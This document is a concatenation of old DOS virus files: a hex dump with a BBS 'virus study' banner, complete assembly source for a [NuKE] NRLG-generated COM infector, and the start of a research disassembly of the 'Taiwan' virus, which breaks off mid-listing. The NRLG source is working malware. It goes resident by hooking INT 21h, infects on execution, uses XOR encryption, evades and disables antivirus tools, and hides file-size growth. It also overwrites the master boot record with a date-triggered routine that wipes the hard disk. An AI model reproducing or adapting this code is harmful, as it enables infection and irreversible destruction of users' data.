28F8:01A0 C1 8E D8 B0 21 B4 25 CD-21 8B 16 C1 02 8B 0E C3 ....!.%.!.......
|
||||
28F8:01B0 02 A1 CB 02 8E D8 89 16-00 01 89 0E 02 01 8E C0 ................
|
||||
28F8:01C0 59 58 2E FF 2E C9 02 90-50 1E 52 8C C8 8E D8 BA YX......P.R.....
|
||||
28F8:01D0 CE 02 B4 09 E8 D9 00 EB-F6 90 80 FC 3D 74 03 E9 ............=t..
|
||||
28F8:01E0 C7 00 90 1E 06 50 53 51-52 57 56 8B FA 8C DE 8E .....PSQRWV.....
|
||||
28F8:01F0 C6 B0 00 B9 32 00 FC F2-AE 83 EF 03 B8 4F 4D 26 ....2........OM&
|
||||
28F8:0200 3B 05 74 03 E9 9A 00 B8-2E 43 26 3B 45 FE 74 03 ;.t......C&;E.t.
|
||||
28F8:0210 E9 8E 00 B4 3D B0 02 E8-96 00 73 03 E9 82 00 8B ....=.....s.....
|
||||
28F8:0220 D8 B9 00 00 BA 00 00 B0-02 B4 42 E8 82 00 3D 00 ..........B...=.
|
||||
28F8:0230 FE 73 6E 2D 03 00 2E A3-BE 02 B4 42 B0 00 B9 00 .sn-.......B....
|
||||
28F8:0240 00 BA 00 00 E8 69 00 B4-3F B9 04 00 BA C1 02 8C .....i..?.......
|
||||
28F8:0250 CF 8E DF E8 5A 00 B0 05-3A 06 C4 02 74 43 B4 42 ....Z...:...tC.B
|
||||
28F8:0260 B0 00 B9 00 00 8B D1 E8-46 00 B0 E9 2E A2 BD 02 ........F.......
|
||||
28F8:0270 B0 05 2E A2 C0 02 B9 04-00 BA BD 02 8C C8 8E D8 ................
|
||||
28F8:0280 B4 40 E8 2B 00 B4 42 B0-02 B9 00 00 8B D1 E8 1F .@.+..B.........
|
||||
28F8:0290 00 BA 00 01 B9 00 02 B4-40 E8 14 00 B4 3E E8 0F ........@....>..
|
||||
28F8:02A0 00 5E 5F 5A 59 5B 58 07-1F 90 2E FF 2E B7 02 CF .^_ZY[X.........
|
||||
28F8:02B0 9C 2E FF 1E B7 02 C3 16-13 0C 02 02 00 E9 06 06 ................
|
||||
28F8:02C0 05 E9 06 04 05 01 00 00-00 00 01 F0 09 01 ..............
|
||||
|
||||
;Kiˇrand˘ sz”veg kezdete
|
||||
28F8:02C0 54 75 Tu
|
||||
28F8:02D0 72 62 6F 20 4B 75 6B 61-63 20 39 2E 39 20 20 20 rbo Kukac 9.9
|
||||
28F8:02E0 20 20 20 24 $
|
||||
|
||||
28F8:02E0 00 00 00 00-00 00 00 00 00 00 00 00 ............
|
||||
28F8:02F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 FA 00 ................
|
||||
28F8:0300 C7 .
|
||||
|
||||
;****************************************************************************;
|
||||
; ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] For All Your H/P/A/V Files [=- ;
|
||||
; -=] SysOp: Peter Venkman [=- ;
|
||||
; -=] [=- ;
|
||||
; -=] +31.(o)79.426o79 [=- ;
|
||||
; -=] P E R F E C T C R I M E [=- ;
|
||||
; -=][][][][][][][][][][][][][][][=- ;
|
||||
; ;
|
||||
; *** NOT FOR GENERAL DISTRIBUTION *** ;
|
||||
; ;
|
||||
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
|
||||
; Around Among the General Public. It Will be Very Useful for Learning how ;
|
||||
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
|
||||
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
|
||||
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
|
||||
; Is. Keep This Code in Responsible Hands! ;
|
||||
; ;
|
||||
;****************************************************************************;
|
|
@ -0,0 +1,590 @@
|
|||
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||||
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
|
||||
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
|
||||
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
|
||||
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
|
||||
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
|
||||
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||||
|
||||
.286
|
||||
code segment
|
||||
assume cs:code,ds:code
|
||||
org 100h
|
||||
|
||||
start: CALL NEXT
|
||||
|
||||
NEXT:
|
||||
mov di,sp ;take the stack pointer location
|
||||
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
|
||||
sub bp,offset next ;subtract the large code off this code
|
||||
;
|
||||
;*******************************************************************
|
||||
; #1 DECRYPT ROUTINE
|
||||
;*******************************************************************
|
||||
|
||||
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
|
||||
je crypt2 ;yes! not decrypt
|
||||
;----------------------------------------------------------
|
||||
mov cx,offset fin ;cx = large of virus
|
||||
lea di,[offset crypt]+ bp ;di = first byte to decrypt
|
||||
mov dx,1 ;dx = value for decrypt
|
||||
;----------------------------------------------------------
|
||||
deci: ;deci = fuck label!
|
||||
;----------------------------------------------------------
|
||||
|
||||
ÿinc di
|
||||
inc di
|
||||
;----------------------------------------------------------
|
||||
jmp bye ;######## BYE BYE F-PROT ! ##########
|
||||
mov ah,4ch
|
||||
int 21h
|
||||
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
|
||||
;-----------------------------------------------------------
|
||||
mov ah,0bh ;######### BYE BYE TBAV ! ##########
|
||||
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
|
||||
;----------------------------------------------------------
|
||||
loop deci ;repeat please!
|
||||
;
|
||||
;*****************************************************************
|
||||
; #2 DECRYPT ROUTINE
|
||||
;*****************************************************************
|
||||
;
|
||||
crypt: ;fuck label!
|
||||
;
|
||||
mov cx,offset fin ;cx = large of virus
|
||||
lea di,[offset crypt2] + bp ;di = first byte to decrypt
|
||||
;---------------------------------------------------------------
|
||||
deci2: ;
|
||||
xor byte ptr cs:[di],1 ;decrytion rutine
|
||||
inc di ;very simple...
|
||||
loop deci2 ;
|
||||
;---------------------------------------------------------------
|
||||
crypt2: ;fuck label!
|
||||
;
|
||||
MOV AX,0CACAH ;call to my resident interrup mask
|
||||
INT 21H ;for chek "I'm is residet?"
|
||||
CMP Bh,0CAH ;is equal to CACA?
|
||||
JE PUM2 ;yes! jump to runnig program
|
||||
call action
|
||||
;*****************************************************************
|
||||
; NRLG FUNCTIONS (SELECTABLE)
|
||||
;*****************************************************************
|
||||
|
||||
ÿcall MBR
|
||||
call TRASH_RN
|
||||
call ANTI_V
|
||||
;****************************************************************
|
||||
; PROCESS TO REMAIN RESIDENT
|
||||
;****************************************************************
|
||||
|
||||
mov ax,3521h
|
||||
int 21h ;store the int 21 vectors
|
||||
mov word ptr [bp+int21],bx ;in cs:int21
|
||||
mov word ptr [bp+int21+2],es ;
|
||||
;---------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ax ;ax = my actual segment
|
||||
dec ax ;dec my segment for look my MCB
|
||||
mov es,ax ;
|
||||
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
|
||||
;---------------------------------------------------------------
|
||||
push cs ;
|
||||
pop es ;
|
||||
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
|
||||
sub bx,17 + offset fin ;and 100H for the PSP total
|
||||
mov ah,4ah ;used memory
|
||||
int 21h ;put the new value to MCB
|
||||
;---------------------------------------------------------------
|
||||
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
|
||||
mov ah,48h ;
|
||||
int 21h ;request the memory to fuck DOS!
|
||||
;---------------------------------------------------------------
|
||||
dec ax ;ax=new segment
|
||||
mov es,ax ;ax-1= new segment MCB
|
||||
mov byte ptr es:[1],8 ;put '8' in the segment
|
||||
;--------------------------------------------------------------
|
||||
inc ax ;
|
||||
mov es,ax ;es = new segment
|
||||
lea si,[bp + offset start] ;si = start of virus
|
||||
mov di,100h ;di = 100H (psp position)
|
||||
mov cx,offset fin - start ;cx = lag of virus
|
||||
push cs ;
|
||||
pop ds ;ds = cs
|
||||
cld ;mov the code
|
||||
rep movsb ;ds:si >> es:di
|
||||
;--------------------------------------------------------------
|
||||
mov dx,offset virus ;dx = new int21 handler
|
||||
mov ax,2521h ;
|
||||
push es ;
|
||||
pop ds ;
|
||||
int 21h ;set the vectors
|
||||
;-------------------------------------------------------------
|
||||
pum2: ;
|
||||
;
|
||||
mov ah,byte ptr [cs:bp + real] ;restore the 3
|
||||
mov byte ptr cs:[100h],ah ;first bytes
|
||||
mov ax,word ptr [cs:bp + real + 1] ;
|
||||
mov word ptr cs:[101h],ax ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,100h ;
|
||||
jmp ax ;jmp to execute
|
||||
;
|
||||
;*****************************************************************
|
||||
;* HANDLER FOR THE INT 21H
|
||||
;*****************************************************************
|
||||
;
|
||||
VIRUS: ;
|
||||
;
|
||||
cmp ah,4bh ;is a 4b function?
|
||||
je REPRODUCCION ;yes! jump to reproduce !
|
||||
cmp ah,11h
|
||||
je dir
|
||||
cmp ah,12h
|
||||
je dir
|
||||
dirsal:
|
||||
cmp AX,0CACAH ;is ... a caca function? (resident chek)
|
||||
jne a3 ;no! jump to a3
|
||||
mov bh,0cah ;yes! put ca in bh
|
||||
a3: ;
|
||||
JMP dword ptr CS:[INT21] ;jmp to original int 21h
|
||||
ret ;
|
||||
make db '[NuKE] N.R.L.G. AZRAEL'
|
||||
dir:
|
||||
jmp dir_s
|
||||
;-------------------------------------------------------------
|
||||
REPRODUCCION: ;
|
||||
;
|
||||
pushf ;put the register
|
||||
pusha ;in the stack
|
||||
push si ;
|
||||
push di ;
|
||||
push bp ;
|
||||
push es ;
|
||||
push ds ;
|
||||
;-------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ax,3524H ;get the dos error control
|
||||
int 21h ;interupt
|
||||
mov word ptr error,es ;and put in cs:error
|
||||
mov word ptr error+2,bx ;
|
||||
mov ax,2524H ;change the dos error control
|
||||
mov dx,offset all ;for my "trap mask"
|
||||
int 21h ;
|
||||
;-------------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;restore the registers
|
||||
pop bp ;
|
||||
pop di ;
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;-------------------------------------------------------------
|
||||
pushf ;put the registers
|
||||
pusha ;
|
||||
push si ;HEY! AZRAEL IS CRAZY?
|
||||
push di ;PUSH, POP, PUSH, POP
|
||||
push bp ;PLEEEEEAAAAAASEEEEEEEEE
|
||||
push es ;PURIFY THIS SHIT!
|
||||
push ds ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,4300h ;
|
||||
int 21h ;get the file
|
||||
mov word ptr cs:[attrib],cx ;atributes
|
||||
;-------------------------------------------------------------
|
||||
mov ax,4301h ;le saco los atributos al
|
||||
xor cx,cx ;file
|
||||
int 21h ;
|
||||
;-------------------------------------------------------------
|
||||
mov ax,3d02h ;open the file
|
||||
int 21h ;for read/write
|
||||
mov bx,ax ;bx=handle
|
||||
;-------------------------------------------------------------
|
||||
mov ax,5700h ;
|
||||
int 21h ;get the file date
|
||||
mov word ptr cs:[hora],cx ;put the hour
|
||||
mov word ptr cs:[dia],dx ;put the day
|
||||
and cx,word ptr cs:[fecha] ;calculate the seconds
|
||||
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
|
||||
jne seguir ;yes! the file is infected!
|
||||
jmp cerrar ;
|
||||
;------------------------------------------------------------
|
||||
seguir: ;
|
||||
mov ax,4202h ;move the pointer to end
|
||||
call movedor ;of the file
|
||||
;------------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
sub ax,3 ;calculate the
|
||||
mov word ptr [cs:largo],ax ;jmp long
|
||||
;-------------------------------------------------------------
|
||||
mov ax,04200h ;move the pointer to
|
||||
call movedor ;start of file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;read the 3 first bytes
|
||||
mov ah,3fh ;
|
||||
mov cx,3 ;
|
||||
lea dx,[cs:real] ;put the bytes in cs:[real]
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
|
||||
jne er1 ;yes! is a EXE... fuckkk!
|
||||
;----------------------------------------------------------
|
||||
jmp cerrar
|
||||
er1:
|
||||
;----------------------------------------------------------
|
||||
mov ax,4200h ;move the pointer
|
||||
call movedor ;to start fo file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ah,40h ;
|
||||
mov cx,1 ;write the JMP
|
||||
lea dx,[cs:jump] ;instruccion in the
|
||||
int 21h ;fist byte of the file
|
||||
;----------------------------------------------------------
|
||||
mov ah,40h ;write the value of jmp
|
||||
mov cx,2 ;in the file
|
||||
lea dx,[cs:largo] ;
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
mov ax,04202h ;move the pointer to
|
||||
call movedor ;end of file
|
||||
;----------------------------------------------------------
|
||||
push cs ;
|
||||
pop ds ;move the code
|
||||
push cs ;of my virus
|
||||
pop es ;to cs:end+50
|
||||
cld ;for encrypt
|
||||
mov si,100h ;
|
||||
mov di,offset fin + 50 ;
|
||||
mov cx,offset fin - 100h ;
|
||||
rep movsb ;
|
||||
;----------------------------------------------------------
|
||||
mov cx,offset fin
|
||||
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
|
||||
enc: ;
|
||||
xor byte ptr cs:[di],1 ;encrypt the virus
|
||||
inc di ;code
|
||||
loop enc ;
|
||||
;---------------------------------------------------------
|
||||
mov cx,offset fin
|
||||
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
|
||||
mov dx,1
|
||||
enc2: ;
|
||||
|
||||
ÿinc di
|
||||
inc di ;the virus code
|
||||
loop enc2 ;
|
||||
;--------------------------------------------
|
||||
mov ah,40h ;
|
||||
mov cx,offset fin - offset start ;copy the virus
|
||||
mov dx,offset fin + 50 ;to end of file
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
cerrar: ;
|
||||
;restore the
|
||||
mov ax,5701h ;date and time
|
||||
mov cx,word ptr cs:[hora] ;file
|
||||
mov dx,word ptr cs:[dia] ;
|
||||
or cx,word ptr cs:[fecha] ;and mark the seconds
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
mov ah,3eh ;
|
||||
int 21h ;close the file
|
||||
;----------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;restore the
|
||||
pop bp ;registers
|
||||
pop di ;
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;----------------------------------------------------------
|
||||
pusha ;
|
||||
;
|
||||
mov ax,4301h ;restores the atributes
|
||||
mov cx,word ptr cs:[attrib] ;of the file
|
||||
int 21h ;
|
||||
;
|
||||
popa ;
|
||||
;----------------------------------------------------------
|
||||
pushf ;
|
||||
pusha ; 8-( = f-prot
|
||||
push si ;
|
||||
push di ; 8-( = tbav
|
||||
push bp ;
|
||||
push es ; 8-) = I'm
|
||||
push ds ;
|
||||
;----------------------------------------------------------
|
||||
mov ax,2524H ;
|
||||
lea bx,error ;restore the
|
||||
mov ds,bx ;errors handler
|
||||
lea bx,error+2 ;
|
||||
int 21h ;
|
||||
;----------------------------------------------------------
|
||||
pop ds ;
|
||||
pop es ;
|
||||
pop bp ;restore the
|
||||
pop di ;resgisters
|
||||
pop si ;
|
||||
popa ;
|
||||
popf ;
|
||||
;----------------------------------------------------------
|
||||
JMP A3 ;jmp to orig. INT 21
|
||||
;
|
||||
;**********************************************************
|
||||
; SUBRUTINES AREA
|
||||
;**********************************************************
|
||||
;
|
||||
movedor: ;
|
||||
;
|
||||
xor cx,cx ;use to move file pointer
|
||||
xor dx,dx ;
|
||||
int 21h ;
|
||||
ret ;
|
||||
;----------------------------------------------------------
|
||||
all: ;
|
||||
;
|
||||
XOR AL,AL ;use to set
|
||||
iret ;error flag
|
||||
|
||||
;***********************************************************
|
||||
; DATA AREA
|
||||
;***********************************************************
|
||||
largo dw ?
|
||||
jump db 0e9h
|
||||
real db 0cdh,20h,0
|
||||
hora dw ?
|
||||
dia dw ?
|
||||
attrib dw ?
|
||||
int21 dd ?
|
||||
error dd ?
|
||||
|
||||
ÿ;---------------------------------
|
||||
action: ;
|
||||
MOV AH,2AH ;
|
||||
INT 21H ;get date
|
||||
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
|
||||
JE cont ;nop! fuck ret
|
||||
cmp byte ptr cs:[action_dia+bp],32 ;
|
||||
jne no_day ;
|
||||
cont: ;
|
||||
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
|
||||
je set ;
|
||||
cmp byte ptr cs:[action_mes+bp],13 ;
|
||||
jne NO_DAY ;nop! fuck ret
|
||||
set: ;
|
||||
|
||||
mov ax,351ch ;
|
||||
int 21h ;store the int 1ch vectors
|
||||
mov word ptr [trampaint+bp],bx ;in cs:trampaint
|
||||
mov word ptr [trampaint+2+bp],es ;
|
||||
mov ax,251ch ;put the int 1ch (clock) vector
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov dx,offset tardar ;in offset tardar
|
||||
int 21h ;
|
||||
mov dx,offset fin ;
|
||||
int 27h ;main resident the code
|
||||
NO_DAY: ;
|
||||
ret ;ret for program
|
||||
tardar: ;int 1c handler
|
||||
pushf ;
|
||||
pusha ;
|
||||
mov cx,0ffffh ;fuck loop for slow speed
|
||||
trampa: ;
|
||||
mov ax,ax ;
|
||||
loop trampa ;
|
||||
popa ;
|
||||
popf ;
|
||||
JMP dword ptr CS:[trampaint+bp] ;jmp to original int 1ch
|
||||
ret ;
|
||||
trampaint dd ? ;
|
||||
;--------------------------------;
|
||||
|
||||
ÿMBR:
|
||||
;**************************************
|
||||
; Start of MBR-BOMB writing
|
||||
;**************************************
|
||||
mov ax,9f80h ;very high memory
|
||||
mov es,ax ;good for buffer
|
||||
mov ax,0201h ;read the original
|
||||
mov cx,0001h ;MBR of the disk
|
||||
mov dx,0080h ;
|
||||
xor bx,bx ;to buffer 9f80:0000h
|
||||
int 13h ;
|
||||
push cs ;
|
||||
pop ds ;
|
||||
mov ax,9f80h ;add my MBR-BOMB
|
||||
mov es,ax ;to real MBR in my
|
||||
mov si,offset fat ;buffer
|
||||
xor di,di ;
|
||||
mov cx,105 ;ds:[fat]=>9f80:0000h
|
||||
repe movsb ;total 105bytes
|
||||
mov ax,9f80h ;
|
||||
mov es,ax ;
|
||||
xor bx,bx ;replace the original
|
||||
mov ax,0301h ;MBR in the disk by the
|
||||
xor ch,ch ;new MBR-BOMB.
|
||||
mov dx,0080h ;
|
||||
mov cl,1 ;WARNING! VSAFE/MSAVE
|
||||
mov bx,0 ;NOTIFY THIS ACTION
|
||||
int 13h ;
|
||||
ret ;
|
||||
;---------------------------------------------------
|
||||
;*********************
|
||||
; Start of MBR code
|
||||
;*********************
|
||||
fat: ;
|
||||
cli ;#
|
||||
xor ax,ax ;#
|
||||
mov ss,ax ;#
|
||||
mov sp,7C00h ;#
|
||||
mov si,sp ;#
|
||||
push ax ;#
|
||||
pop es ;#
|
||||
push ax ;#
|
||||
pop ds ;#
|
||||
sti ;#
|
||||
;#
|
||||
pushf ;#
|
||||
push ax ;#
|
||||
push cx ;# = This code be in the
|
||||
push dx ;# original MBR
|
||||
push ds ;# (NOT MODIFY)
|
||||
push es ;#
|
||||
MOV AH,04H ; Read real tyme
|
||||
INT 1AH ; Clock
|
||||
CMP DH,cs:byte ptr action_mes ; is Month?
|
||||
JE CAGO ; yes! SNIF SNIF HD.
|
||||
lit:
|
||||
pop es
|
||||
pop ds
|
||||
pop dx
|
||||
pop cx
|
||||
pop ax
|
||||
popf
|
||||
jmp booti
|
||||
CAGO:
|
||||
;++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
; START OF YOUR DESTRUCTIVE CODE (or not destructive)
|
||||
;++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
|
||||
rip_hd:
|
||||
;@
|
||||
xor dx, dx ;@
|
||||
rip_hd1: ;@
|
||||
mov cx, 2 ;@
|
||||
mov ax, 311h ;@
|
||||
mov dl, 80h ;@
|
||||
mov bx, 5000h ;@
|
||||
mov es, bx ;@
|
||||
int 13h ;@
|
||||
jae rip_hd2 ;@
|
||||
xor ah, ah ;@
|
||||
int 13h ;@
|
||||
rip_hd2: ;@
|
||||
inc dh ;@
|
||||
cmp dh, 4 ;@
|
||||
jb rip_hd1 ;@
|
||||
inc ch ;@
|
||||
jmp rip_hd
|
||||
|
||||
;+++++++++++++++++++++++++++++++++++++++++++
|
||||
; END OF YOUR DESTRUCUTIVE CODE
|
||||
;+++++++++++++++++++++++++++++++++++++++++++
|
||||
booti:
|
||||
xor ax,ax ;#
|
||||
mov es,ax ;#
|
||||
mov bx,7c00h ;#
|
||||
mov ah,02 ;#
|
||||
mov al,1 ;#
|
||||
mov cl,1 ;# #= This code be
|
||||
mov ch,0 ;# in the original
|
||||
mov dh,1 ;# MBR
|
||||
mov dl,80h ;# (NOT MODIFY)
|
||||
;#
|
||||
int 13h ;#
|
||||
;#
|
||||
db 0eah,00,7ch,00,00 ;#
|
||||
;*******************
|
||||
; END OF MBR CODE
|
||||
;*******************
|
||||
|
||||
ÿ;---------------------------------
|
||||
TRASH_RN: ;
|
||||
MOV AH,2DH ;
|
||||
INT 21H ;get date
|
||||
CMP Dl,6 ;is =6 (RAN 0-99)
|
||||
jne NO_DAYY ;nop! fuck ret
|
||||
mov ah,0dh ;
|
||||
int 21h ;reset disk
|
||||
mov al,2 ;
|
||||
mov cx,0ffffh ;
|
||||
mov dx,0 ;
|
||||
int 26h ;fuck ffffh sector
|
||||
mov ah,0dh ;reste disk
|
||||
int 21h ;
|
||||
mov al,2 ;
|
||||
mov cx,0ffffh ;
|
||||
mov dx,0ffffh ;new fuck+
|
||||
int 26h ;heheheh!!!
|
||||
NO_DAYY: ;
|
||||
ret ;
|
||||
;---------------------------------
|
||||
ÿ;---------------------------------
|
||||
ANTI_V: ;
|
||||
MOV AX,0FA01H ;REMOVE VSAFE FROM MEMORY
|
||||
MOV DX,5945H ;
|
||||
INT 21H ;
|
||||
ret ;
|
||||
;---------------------------------
|
||||
|
||||
ÿ;*****************************************************
|
||||
dir_s:
|
||||
pushf
|
||||
push cs
|
||||
call a3 ;Get file Stats
|
||||
test al,al ;Good FCB?
|
||||
jnz no_good ;nope
|
||||
push ax
|
||||
push bx
|
||||
push es
|
||||
mov ah,51h ;Is this Undocmented? huh...
|
||||
int 21h
|
||||
mov es,bx
|
||||
cmp bx,es:[16h]
|
||||
jnz not_infected
|
||||
mov bx,dx
|
||||
mov al,[bx]
|
||||
push ax
|
||||
mov ah,2fh ;Get file DTA
|
||||
int 21h
|
||||
pop ax
|
||||
inc al
|
||||
jnz fcb_okay
|
||||
add bx,7h
|
||||
fcb_okay: mov ax,es:[bx+17h]
|
||||
and ax,1fh ;UnMask Seconds Field
|
||||
xor al,byte ptr cs:fechad
|
||||
jnz not_infected
|
||||
and byte ptr es:[bx+17h],0e0h
|
||||
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus size
|
||||
sbb es:[bx+1fh],ax
|
||||
not_infected:pop es
|
||||
pop bx
|
||||
pop ax
|
||||
no_good: iret
|
||||
;********************************************************************
|
||||
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
|
||||
;*********************************************************************
|
||||
|
||||
ÿaction_dia Db 01H ;day for the action
|
||||
action_mes Db 01H ;month for the action
|
||||
FECHA DW 01eH ;Secon for mark
|
||||
FECHAd Db 01eH ;Secon for mark dir st
|
||||
fin:
|
||||
code ends
|
||||
end start
|
|
@ -0,0 +1,407 @@
|
|||
|
||||
PAGE 60,132
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Progrming Research Group T.R.A.U.M.A. º
|
||||
; º Universidade Autonoma de Lisboa º
|
||||
; º The 'Taiwan' Virus º
|
||||
; º Disassembled by J.L. and J.C, Feb 1990 º
|
||||
; º º
|
||||
; º Not Copyrighted (c) Jean Luz. º
|
||||
; º º
|
||||
; º This listing is only to be made available to TRAUMA researchers º
|
||||
; º º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.1
|
||||
|
||||
data_1e equ 58h ; (0000:0058=0A9Ch)
|
||||
data_2e equ 5Ah ; (0000:005A=0D81h)
|
||||
data_3e equ 475h ; (0000:0475=2)
|
||||
data_7e equ 95h ; (76AC:0095=0A1h)
|
||||
data_8e equ 96h ; (76AC:0096=58h)
|
||||
data_9e equ 98h ; (76AC:0098=44A3h)
|
||||
data_10e equ 9Ah ; (76AC:009A=2601h)
|
||||
data_11e equ 9Eh ; (76AC:009E=0)
|
||||
data_12e equ 114h ; (76AC:0114=0BAh)
|
||||
data_13e equ 13Eh ; (76AC:013E=9Eh)
|
||||
data_14e equ 13Fh ; (76AC:013F=0)
|
||||
data_15e equ 140h ; (76AC:0140=21CDh)
|
||||
data_16e equ 142h ; (76AC:0142=0B4h)
|
||||
data_17e equ 143h ; (76AC:0143=3Dh)
|
||||
data_18e equ 144h ; (76AC:0144=2B0h)
|
||||
data_19e equ 146h ; (76AC:0146=9EBAh)
|
||||
data_20e equ 148h ; (76AC:0148=0)
|
||||
data_21e equ 14Bh ; (76AC:014B=8Bh)
|
||||
data_22e equ 17Ah ; (76AC:017A=40h)
|
||||
|
||||
code_seg_a segment
|
||||
assume cs:code_seg_a, ds:code_seg_a
|
||||
|
||||
|
||||
|
||||
tw proc far
|
||||
jmp short loc_a
|
||||
db 0B0h, 67h, 3Ch, 67h
|
||||
db 0CFh, 2Ah, 2Eh, 63h, 6Fh, 6Dh
|
||||
db 0, 2Ah, 0, 5Ch, 0, 2Eh
|
||||
db 2Eh, 0, 0, 5Ch, 0
|
||||
db 31h
|
||||
db 40 dup (0)
|
||||
db 64h, 0, 0, 0, 50h, 10h
|
||||
db 0, 0FCh, 0,
|
||||
loc_a: jmp short loc_1
|
||||
db 0EDh
|
||||
db 0D8h, 0CFh, 0CFh, 0DEh, 0C3h, 0C4h
|
||||
db 0CDh, 0D9h, 8Ah, 0CCh, 0D8h, 0C5h
|
||||
db 0C7h, 8Ah, 0E4h, 0CBh, 0DEh, 0C3h
|
||||
db 0C5h, 0C4h, 0CBh, 0C6h, 8Ah, 0E9h
|
||||
db 0CFh, 0C4h, 0DEh, 0D8h, 0CBh, 0C6h
|
||||
db 8Ah, 0FFh, 0C4h, 0C3h, 0DCh, 0CFh
|
||||
db 0D8h, 0D9h, 0C3h, 0DEh, 0D3h, 8Ah
|
||||
db 8Bh, 0Ah, 0Dh, 24h, 0E3h, 0D9h
|
||||
db 8Ah, 0DEh, 0C5h, 0CEh, 0CBh, 0D3h
|
||||
db 8Ah, 0D9h, 0DFh, 0C4h, 0C4h, 0D3h
|
||||
db 8Ah, 95h
|
||||
db 0Ah, 0Dh, 24h
|
||||
loc_1:
|
||||
cli ; Disable interrupts
|
||||
push es
|
||||
mov ax,0
|
||||
mov es,ax
|
||||
;
|
||||
; To begin, let's read and change some interrupts - replacing one with other
|
||||
;
|
||||
mov ax,es:data_1e ; (0000:0058=0A9Ch)
|
||||
mov ds:data_18e,ax ; (76AC:0144=2B0h)
|
||||
mov ax,es:data_2e ; (0000:005A=0D81h)
|
||||
mov ds:data_19e,ax ; (76AC:0146=9EBAh)
|
||||
mov word ptr es:data_1e,102h ; (0000:0058=0A9Ch)
|
||||
mov es:data_2e,cs ; (0000:005A=0D81h)
|
||||
pop es
|
||||
;
|
||||
; now reprogram the primary interrupt controller (the only one on the PC/XT)
|
||||
in al,21h ; port 21h, 8259-1 int IMR
|
||||
or al,2
|
||||
out 21h,al ; port 21h, 8259-1 int comands
|
||||
sti ; Enable interrupts
|
||||
mov cx,80h
|
||||
mov si,0
|
||||
mov bx,80h
|
||||
|
||||
locloop_2:
|
||||
mov ax,[bx+si]
|
||||
push ax
|
||||
inc si
|
||||
inc si
|
||||
loop locloop_2 ; Loop if cx > 0
|
||||
|
||||
mov byte ptr ds:data_12e,0 ; (76AC:0114=0BAh)
|
||||
mov byte ptr ds:data_13e,0 ; (76AC:013E=9Eh)
|
||||
mov byte ptr ds:data_14e,0 ; (76AC:013F=0)
|
||||
mov byte ptr ds:data_20e,0 ; (76AC:0148=0)
|
||||
mov ah,19h
|
||||
int 21h ; DOS Services ah=function 19h
|
||||
; get default drive al (0=a:)
|
||||
; then store it
|
||||
